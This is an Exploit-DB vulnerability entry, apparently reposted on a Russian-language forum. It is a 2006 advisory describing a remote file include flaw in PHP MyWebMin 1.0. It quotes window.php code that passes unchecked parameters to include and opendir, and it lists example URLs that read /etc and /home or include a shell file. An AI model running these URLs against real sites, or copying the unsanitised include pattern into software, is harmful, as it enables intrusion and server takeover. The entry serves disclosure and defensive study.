- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2451
- Проверка EDB
-
- Пройдено
- Автор
- KERNEL-32
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-5125 cve-2006-5124
- Дата публикации
- 2006-09-28
Код:
#######################################
+PHP MyWebMin 1.0 Remote File Include
+Advisory #5
+Product :PHP MyWebMin
+Develop:
+www.josh.ch/joshch/php-tools/phpmywebmin,download.html
+Vulnerable: Remote File Includes
+Risk:High
+Class:Remote
+Discovered:by Kernel-32
+Contact: [email protected]
+Homepage: http://kernel-32.blogspot.com
+Greetz: BeLa ;)
########################################
Vulnerable File:window.php
$ordner = opendir("$target");
?>
and
include("$target/preferences.php");
if($action != "")
{
include("$action.php");
?>
Examples:
http://site/path/window.php?target=/etc
http://site/path/home.php?target=/home
http://site/path/window.php?action=Shell.php
# milw0rm.com [2006-09-28]- Источник
- www.exploit-db.com
